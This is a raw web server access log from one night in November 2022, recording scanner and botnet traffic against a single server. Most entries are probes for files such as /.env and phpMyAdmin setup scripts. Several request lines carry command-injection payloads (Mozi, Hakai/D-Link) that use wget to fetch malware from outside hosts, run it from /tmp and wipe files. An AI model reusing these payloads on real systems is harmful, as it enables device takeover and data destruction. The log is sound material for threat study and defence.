105.68.212.247 - - [04/Nov/2022:01:43:33 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
105.68.212.247 - - [04/Nov/2022:01:43:33 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
105.68.212.247 - - [04/Nov/2022:01:43:33 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
105.68.212.247 - - [04/Nov/2022:01:43:33 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
105.68.212.247 - - [04/Nov/2022:01:43:33 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
105.68.212.247 - - [04/Nov/2022:01:43:33 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
105.68.212.247 - - [04/Nov/2022:01:43:33 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
105.68.212.247 - - [04/Nov/2022:01:43:34 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
185.122.204.30 - - [04/Nov/2022:01:43:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [04/Nov/2022:01:43:36 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
31.220.1.83 - - [04/Nov/2022:01:44:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
185.122.204.30 - - [04/Nov/2022:01:47:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [04/Nov/2022:01:47:47 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
165.22.208.62 - - [04/Nov/2022:01:48:15 +0100] "\xf7\xf1\vXo\xba;\x1b,\xc9\x04\xbc\x0f\xe4\xdb8\xc6.\x89*\xe6" 400 329 "-" "-"
165.22.208.62 - - [04/Nov/2022:01:48:16 +0100] "\x16\x03\x01" 501 318 "-" "-"
165.22.208.62 - - [04/Nov/2022:01:48:16 +0100] "\x16\x03\x01" 501 318 "-" "-"
172.105.77.209 - - [04/Nov/2022:01:51:30 +0100] "\xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf" 400 329 "-" "-"
172.105.77.209 - - [04/Nov/2022:01:51:42 +0100] "\xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf" 400 329 "-" "-"
172.105.77.209 - - [04/Nov/2022:01:51:55 +0100] "\xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf" 400 329 "-" "-"
172.105.77.209 - - [04/Nov/2022:01:52:08 +0100] "\xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf" 400 329 "-" "-"
172.105.77.209 - - [04/Nov/2022:01:52:46 +0100] "\xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf" 400 329 "-" "-"
192.241.208.34 - - [04/Nov/2022:01:53:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
172.105.77.209 - - [04/Nov/2022:01:53:23 +0100] "\xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf" 400 329 "-" "-"
192.241.208.34 - - [04/Nov/2022:01:53:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
172.105.77.209 - - [04/Nov/2022:01:53:32 +0100] "\xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf" 400 329 "-" "-"
172.105.77.209 - - [04/Nov/2022:01:53:36 +0100] "\xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf" 400 329 "-" "-"
192.241.208.34 - - [04/Nov/2022:01:53:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.208.34 - - [04/Nov/2022:01:53:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
172.105.77.209 - - [04/Nov/2022:01:53:44 +0100] "\xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf" 400 329 "-" "-"
172.105.77.209 - - [04/Nov/2022:01:53:49 +0100] "\xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf" 400 329 "-" "-"
128.14.134.170 - - [04/Nov/2022:01:54:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
192.241.208.34 - - [04/Nov/2022:01:55:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.208.34 - - [04/Nov/2022:01:55:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.208.34 - - [04/Nov/2022:01:55:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.208.34 - - [04/Nov/2022:01:55:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.208.34 - - [04/Nov/2022:01:57:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
31.220.1.83 - - [04/Nov/2022:01:57:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
31.220.1.83 - - [04/Nov/2022:02:08:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
194.180.48.125 - - [04/Nov/2022:02:09:53 +0100] "GET /docker-compose.yml HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Linux; Android 9; SM-N960F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36"
31.220.1.83 - - [04/Nov/2022:02:13:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.222 - - [04/Nov/2022:02:17:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
162.142.125.222 - - [04/Nov/2022:02:17:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.222 - - [04/Nov/2022:02:17:06 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
162.142.125.222 - - [04/Nov/2022:02:17:06 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
64.62.197.141 - - [04/Nov/2022:02:27:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36 OPR/90.0.4480.100"
64.62.197.47 - - [04/Nov/2022:02:27:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
128.1.248.26 - - [04/Nov/2022:02:30:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
64.62.197.148 - - [04/Nov/2022:02:30:39 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36 OPR/90.0.4480.84"
64.62.197.48 - - [04/Nov/2022:02:30:43 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.50"
178.128.237.221 - - [04/Nov/2022:02:31:53 +0100] "\x16\x03\x01" 501 318 "-" "-"
178.128.237.221 - - [04/Nov/2022:02:31:53 +0100] "\x16\x03\x01" 501 318 "-" "-"
178.128.237.221 - - [04/Nov/2022:02:31:53 +0100] "\x16\x03\x01" 501 318 "-" "-"
117.255.18.114 - - [04/Nov/2022:02:33:51 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://117.255.18.114:35173/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 310 "-" "Hello, world"
194.180.48.125 - - [04/Nov/2022:02:35:42 +0100] "GET /explore HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Linux; U; Android 2.2; en-us; Sprint APA9292KT Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
34.82.145.219 - - [04/Nov/2022:02:36:04 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
34.82.145.219 - - [04/Nov/2022:02:36:04 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
62.138.2.160 - - [04/Nov/2022:02:38:09 +0100] "GET /robots.txt HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
62.138.2.160 - - [04/Nov/2022:02:38:09 +0100] "GET /sitemap.xml HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
45.227.254.54 - - [04/Nov/2022:02:38:45 +0100] "\x03" 501 316 "-" "-"
185.16.38.231 - - [04/Nov/2022:02:39:23 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; Android 7.1.1; CPH1729) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36"
194.180.48.125 - - [04/Nov/2022:02:39:44 +0100] "GET /explore HTTP/1.1" 404 312 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1"
194.180.48.125 - - [04/Nov/2022:02:41:45 +0100] "GET /explore HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Linux; Android 6.0; ALE-L21 Build/HuaweiALE-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36"
194.180.48.125 - - [04/Nov/2022:02:45:17 +0100] "GET /explore HTTP/1.1" 404 312 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows Phone OS 7.0; Trident/3.1; IEMobile/7.0) Asus;Galaxy6"
128.14.134.134 - - [04/Nov/2022:02:48:14 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
143.198.46.29 - - [04/Nov/2022:02:49:06 +0100] "\xb1\x80\x88u.\x07\xe2\xf3#\xbc\xbd\x065s\x92<*\xf9v\x93" 501 338 "-" "-"
143.198.46.29 - - [04/Nov/2022:02:49:06 +0100] "\x16\x03\x01" 501 318 "-" "-"
143.198.46.29 - - [04/Nov/2022:02:49:07 +0100] "\x16\x03\x01" 501 318 "-" "-"
174.138.19.20 - - [04/Nov/2022:02:51:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
102.189.215.42 - - [04/Nov/2022:02:54:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
128.14.209.162 - - [04/Nov/2022:02:55:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
31.220.1.83 - - [04/Nov/2022:02:57:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
128.14.209.162 - - [04/Nov/2022:02:58:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.83.144.103 - - [04/Nov/2022:02:59:27 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.83.144.103 - - [04/Nov/2022:02:59:27 +0100] "\x16\x03\x01\x01D\x01" 501 321 "-" "-"
109.145.247.47 - - [04/Nov/2022:02:59:28 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://46.19.141.122/dlink%20-O%20-%3E%20/tmp/dlink;chmod%20777%20/tmp/dlink;sh%20/tmp/dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
183.136.225.32 - - [04/Nov/2022:02:59:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
183.136.225.32 - - [04/Nov/2022:02:59:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
183.136.225.32 - - [04/Nov/2022:02:59:34 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
183.136.225.32 - - [04/Nov/2022:02:59:35 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
185.122.204.30 - - [04/Nov/2022:03:00:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [04/Nov/2022:03:00:28 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
31.220.1.83 - - [04/Nov/2022:03:00:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
141.255.166.2 - - [04/Nov/2022:03:01:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
185.122.204.30 - - [04/Nov/2022:03:01:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [04/Nov/2022:03:01:25 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
167.248.133.120 - - [04/Nov/2022:03:02:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.120 - - [04/Nov/2022:03:02:51 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
167.248.133.120 - - [04/Nov/2022:03:02:51 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.63 - - [04/Nov/2022:03:02:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.63 - - [04/Nov/2022:03:02:53 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
167.248.133.63 - - [04/Nov/2022:03:02:53 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
185.122.204.30 - - [04/Nov/2022:03:03:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [04/Nov/2022:03:03:51 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
185.122.204.30 - - [04/Nov/2022:03:04:14 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [04/Nov/2022:03:04:14 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
185.122.204.30 - - [04/Nov/2022:03:04:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [04/Nov/2022:03:04:51 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
141.255.166.2 - - [04/Nov/2022:03:04:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
167.172.95.37 - - [04/Nov/2022:03:04:55 +0100] "\xb0\x85\xf5\xdb\x0cwck%s\xd0&%\xfd\x95\xf6\x02T\xbcq\"p\xfeq\x98\xfc?\xda.p\xfeq#t\xbcq\"p\xfdy\"p\xfeq\"p\xfeq\x88p\xfeq\"p\xd5Z\"p\xfeq" 400 329 "-" "-"
167.172.95.37 - - [04/Nov/2022:03:04:55 +0100] "\x16\x03\x01" 501 318 "-" "-"
167.172.95.37 - - [04/Nov/2022:03:04:55 +0100] "\x16\x03\x01" 501 318 "-" "-"
185.122.204.30 - - [04/Nov/2022:03:05:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [04/Nov/2022:03:05:12 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
185.122.204.30 - - [04/Nov/2022:03:06:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [04/Nov/2022:03:06:57 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
185.122.204.30 - - [04/Nov/2022:03:07:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [04/Nov/2022:03:07:25 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
141.255.166.2 - - [04/Nov/2022:03:08:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
185.122.204.30 - - [04/Nov/2022:03:09:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [04/Nov/2022:03:09:10 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
141.255.166.2 - - [04/Nov/2022:03:10:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
117.196.194.15 - - [04/Nov/2022:03:11:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
141.255.166.2 - - [04/Nov/2022:03:13:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
64.62.197.224 - - [04/Nov/2022:03:13:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
41.216.183.144 - - [04/Nov/2022:03:16:15 +0100] "GET /muieblackcat HTTP/1.1" 404 317 "-" "-"
41.216.183.144 - - [04/Nov/2022:03:16:15 +0100] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
41.216.183.144 - - [04/Nov/2022:03:16:15 +0100] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
41.216.183.144 - - [04/Nov/2022:03:16:15 +0100] "GET //pma/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
41.216.183.144 - - [04/Nov/2022:03:16:15 +0100] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
41.216.183.144 - - [04/Nov/2022:03:16:15 +0100] "GET //MyAdmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
64.62.197.219 - - [04/Nov/2022:03:16:17 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:106.0) Gecko/20100101 Firefox/106.0"
178.128.40.239 - - [04/Nov/2022:03:16:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
141.255.166.2 - - [04/Nov/2022:03:17:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
141.255.166.2 - - [04/Nov/2022:03:18:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
41.216.183.144 - - [04/Nov/2022:03:22:31 +0100] "GET /muieblackcat HTTP/1.1" 404 317 "-" "-"
41.216.183.144 - - [04/Nov/2022:03:22:31 +0100] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
41.216.183.144 - - [04/Nov/2022:03:22:31 +0100] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
41.216.183.144 - - [04/Nov/2022:03:22:31 +0100] "GET //pma/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
41.216.183.144 - - [04/Nov/2022:03:22:31 +0100] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
41.216.183.144 - - [04/Nov/2022:03:22:31 +0100] "GET //MyAdmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
142.93.252.100 - - [04/Nov/2022:03:22:43 +0100] "\x16\x03\x01" 501 318 "-" "-"
142.93.252.100 - - [04/Nov/2022:03:22:43 +0100] "\x16\x03\x01" 501 318 "-" "-"
142.93.252.100 - - [04/Nov/2022:03:22:44 +0100] "\x16\x03\x01" 501 318 "-" "-"
41.216.183.144 - - [04/Nov/2022:03:24:03 +0100] "GET /muieblackcat HTTP/1.1" 404 317 "-" "-"
41.216.183.144 - - [04/Nov/2022:03:24:03 +0100] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
41.216.183.144 - - [04/Nov/2022:03:24:03 +0100] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
41.216.183.144 - - [04/Nov/2022:03:24:03 +0100] "GET //pma/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
41.216.183.144 - - [04/Nov/2022:03:24:03 +0100] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
41.216.183.144 - - [04/Nov/2022:03:24:03 +0100] "GET //MyAdmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
198.199.108.71 - - [04/Nov/2022:03:24:51 +0100] "MGLNDD_212.91.246.87_80" 501 338 "-" "-"
109.145.247.47 - - [04/Nov/2022:03:25:03 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://46.19.141.122/dlink%20-O%20-%3E%20/tmp/dlink;chmod%20777%20/tmp/dlink;sh%20/tmp/dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
198.199.108.71 - - [04/Nov/2022:03:25:22 +0100] "MGLNDD_212.91.246.86_80" 501 338 "-" "-"
198.199.108.71 - - [04/Nov/2022:03:25:22 +0100] "MGLNDD_212.91.246.84_80" 501 338 "-" "-"
141.255.166.2 - - [04/Nov/2022:03:26:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
41.216.183.144 - - [04/Nov/2022:03:27:10 +0100] "GET /muieblackcat HTTP/1.1" 404 317 "-" "-"
41.216.183.144 - - [04/Nov/2022:03:27:10 +0100] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
41.216.183.144 - - [04/Nov/2022:03:27:10 +0100] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
41.216.183.144 - - [04/Nov/2022:03:27:10 +0100] "GET //pma/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
41.216.183.144 - - [04/Nov/2022:03:27:10 +0100] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
41.216.183.144 - - [04/Nov/2022:03:27:11 +0100] "GET //MyAdmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
198.199.108.71 - - [04/Nov/2022:03:28:32 +0100] "MGLNDD_212.91.246.81_80" 501 338 "-" "-"
198.199.108.71 - - [04/Nov/2022:03:28:48 +0100] "MGLNDD_212.91.246.83_80" 501 338 "-" "-"
141.255.166.2 - - [04/Nov/2022:03:29:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
198.199.108.71 - - [04/Nov/2022:03:29:41 +0100] "MGLNDD_212.91.246.88_80" 501 338 "-" "-"
198.199.108.71 - - [04/Nov/2022:03:30:44 +0100] "MGLNDD_212.91.246.80_80" 501 338 "-" "-"
198.199.108.71 - - [04/Nov/2022:03:30:47 +0100] "MGLNDD_212.91.246.82_80" 501 338 "-" "-"
198.199.108.71 - - [04/Nov/2022:03:31:33 +0100] "MGLNDD_212.91.246.85_80" 501 338 "-" "-"
41.216.183.144 - - [04/Nov/2022:03:31:55 +0100] "GET /muieblackcat HTTP/1.1" 404 317 "-" "-"
41.216.183.144 - - [04/Nov/2022:03:31:55 +0100] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
41.216.183.144 - - [04/Nov/2022:03:31:55 +0100] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
41.216.183.144 - - [04/Nov/2022:03:31:55 +0100] "GET //pma/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
41.216.183.144 - - [04/Nov/2022:03:31:55 +0100] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
41.216.183.144 - - [04/Nov/2022:03:31:55 +0100] "GET //MyAdmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
14.37.194.217 - - [04/Nov/2022:03:33:40 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+194.180.48.22/lol.sh;sh+/tmp/lol.sh HTTP/1.1" 404 306 "-" "Hello, world"
41.216.183.144 - - [04/Nov/2022:03:34:21 +0100] "GET /muieblackcat HTTP/1.1" 404 317 "-" "-"
41.216.183.144 - - [04/Nov/2022:03:34:21 +0100] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
41.216.183.144 - - [04/Nov/2022:03:34:21 +0100] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
41.216.183.144 - - [04/Nov/2022:03:34:21 +0100] "GET //pma/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
41.216.183.144 - - [04/Nov/2022:03:34:21 +0100] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
41.216.183.144 - - [04/Nov/2022:03:34:21 +0100] "GET //MyAdmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
121.180.228.219 - - [04/Nov/2022:03:35:12 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+194.180.48.22/lol.sh;sh+/tmp/lol.sh HTTP/1.1" 404 306 "-" "Hello, world"
